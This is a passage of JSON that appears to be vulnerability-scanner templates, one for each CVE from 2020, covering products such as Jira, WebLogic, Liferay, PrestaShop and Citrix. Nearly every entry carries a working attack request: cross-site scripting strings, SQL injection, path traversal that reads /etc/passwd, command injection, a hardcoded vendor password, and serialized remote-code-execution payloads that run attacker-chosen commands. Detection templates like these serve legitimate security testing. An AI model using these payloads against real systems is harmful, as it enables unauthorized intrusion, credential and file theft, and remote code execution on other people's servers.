{{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13851","info":{"name":"Artica Pandora FMS 7.44 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["text/html","PHPSESSID="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-27838","info":{"name":"KeyCloak - Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"clientId\":\\s*\"security-admin-console\"","\"secret\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"word","part":"body","words":["window.location.href.indexOf"],"negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor 